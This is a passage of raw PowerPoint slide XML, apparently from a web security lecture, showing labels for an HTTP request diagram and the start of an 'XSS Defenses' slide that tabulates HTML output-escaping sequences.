          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="986790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Method	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-335" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4D702F9-40AB-6D47-9C11-7C18A5B2E546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095659" y="4557460"/>
            <a:ext cx="81980" cy="192812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4AE85D-E43E-F84D-9271-C3A847DCCCF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994184" y="4557460"/>
            <a:ext cx="81980" cy="192812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465B9776-6F47-914B-912A-42A6DEB0F9E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2803854" y="4547935"/>
            <a:ext cx="198107" cy="203836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E15506-1B86-E14D-8EFA-2155BE2FB8B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4421187" y="4330828"/>
            <a:ext cx="927735" cy="299720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F6B8717-D33C-534B-AF14-75FC0C9AD753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350060" y="4636835"/>
            <a:ext cx="514350" cy="337820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="514350" h="337819">
                <a:moveTo>
                  <a:pt x="514039" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="337338"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4288448-9DFC-2A49-8376-0F5AEA52C860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4268258" y="4938341"/>
            <a:ext cx="108590" cy="92788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D9CBAE0-C77A-A442-8F37-03B5592C89FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464848" y="6444715"/>
            <a:ext cx="664210" cy="398780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="664210" h="398779">
                <a:moveTo>
                  <a:pt x="663988" y="398392"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD912985-71DE-A94E-B696-2A9373FF21E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1381192" y="6390711"/>
            <a:ext cx="109369" cy="90510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF7B492C-CC63-804F-9783-CB020200E2C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331116" y="6393909"/>
            <a:ext cx="4383884" cy="386003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="107950" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="850"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Blank</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>line</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D38DF77-79C6-2848-90EF-0C36A3016729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1479054" y="6179028"/>
            <a:ext cx="3092946" cy="398780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2250440" h="435610">
                <a:moveTo>
                  <a:pt x="2249982" y="435480"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01BC220A-9F54-A545-9CA0-43A6A4F60AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384654" y="6138610"/>
            <a:ext cx="109904" cy="80834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93A92DFB-4C97-3E4B-BBDA-DC5252DD7BC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158118" y="6539195"/>
            <a:ext cx="4383884" cy="386003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="107950" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>none </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" spc="-25" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211340107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2304D1-A4FF-CD4C-B5AA-38B94770BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>XSS Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD665A0D-3A60-0C46-B420-B25C7FF87279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output Escaping                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML parser looks for special characters: &lt; &gt; &amp; ” ’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ideally, user-provided input string should not contain special chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escape parser:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2A05A09-DE5F-F649-9B12-2366947978CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2045360150"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="4419600"/>
          <a:ext cx="3962400" cy="2389824"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1485900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2476500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="398304">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Character</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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ECD882"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>Escape</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-25" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>S</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>equence</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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ECD882"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398304">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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F7F0D8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&amp;lt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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F7F0D8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398304">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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AF7EC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&amp;gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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AF7EC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398304">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
